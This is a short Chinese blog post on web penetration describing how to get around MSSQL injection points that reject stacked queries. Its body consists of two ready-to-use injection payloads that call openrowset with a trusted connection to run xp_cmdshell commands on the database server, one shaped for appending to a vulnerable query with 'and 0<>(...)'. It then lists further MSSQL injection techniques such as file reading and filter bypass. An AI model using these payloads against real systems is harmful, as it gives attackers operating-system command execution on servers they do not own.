菜单

MSSQL注入不能多句执行时的突破方法

2017年10月15日 - web渗透类, 原创
SQL执行
  select * from openrowset(‘sqloledb’,’dsn=locaserver;trusted_connection=yes’,’set fmtonly off exec master..xp_cmdshell ”dir c:”’)
  and 0<>(select * from openrowset(‘sqloledb’,’dsn=locaserver;trusted_connection=yes’,’set fmtonly off exec master..xp_cmdshell ”dir c:”’))
以此记录,精通脚本攻击技术这本书里还提到了mssql各种注入技巧。如注入点读文件,读mdb,读txt,反向连接测试,等。全文搜索绕开%,爆出各种信息,以及mssql的union语句注入
标签:

发表评论

电子邮件地址不会被公开。 必填项已用*标注

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据